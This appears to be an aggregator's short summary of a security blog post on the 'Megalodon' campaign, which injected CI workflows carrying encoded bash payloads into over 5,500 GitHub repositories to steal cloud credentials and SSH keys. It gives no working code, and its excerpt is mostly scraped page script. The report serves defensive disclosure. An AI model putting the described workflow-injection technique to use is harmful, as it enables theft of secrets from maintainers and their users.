Megalodon: Mass GitHub Repo Backdooring via CI Workflows
An automated campaign named Megalodon compromised over 5,500 GitHub repositories by injecting malicious commits. The attackers used forged identities to deploy workflows that exfiltrate sensitive information, including cloud credentials and SSH keys. Two variants of the malware were identified, one maximizing automated execution and the other creating dormant backdoors.
- ▪The Megalodon campaign pushed 5,718 malicious commits to 5,561 GitHub repositories in just six hours.
- ▪Attackers used throwaway accounts and forged identities to inject workflows containing base64-encoded bash payloads.
- ▪The campaign exfiltrated various sensitive data, including AWS credentials and SSH private keys.
Opening excerpt (first ~120 words) tap to expand
Back to Blog Megalodon: Mass GitHub Repo Backdooring via CI WorkflowsMalware SafeDep Team• May 21, 2026 • 11 min readTable of Contentsfunction l(){const t=document.querySelectorAll(".prose h1, .prose h2"),e=document.getElementById("toc-nav");if(!e||0===t.length)return[];const n=Array.from(t).map(((t,e)=>{const n=t.id||`heading-${e}`;return t.id=n,{id:n,text:t.textContent||"",level:parseInt(t.tagName.charAt(1),10)}}));return e.innerHTML="",n.forEach((t=>{const n=document.createElement("a");n.href=`#${t.id}`,n.textContent=t.text,n.dataset.level=t.level.toString(),n.className=`\n block text-body1-regular font-body transition-colors duration-200 hover:text-primary-300 truncate lg:max-w-[228px]\n ${1===t.level?"pl-0 text-neutral-300 font-medium":"pl-4 text-neutral-400"}\n…
Excerpt limited to ~120 words for fair-use compliance. The full article is at SafeDep - Real-time Open Source Software Supply Chain Security.
Discussion
0 comments
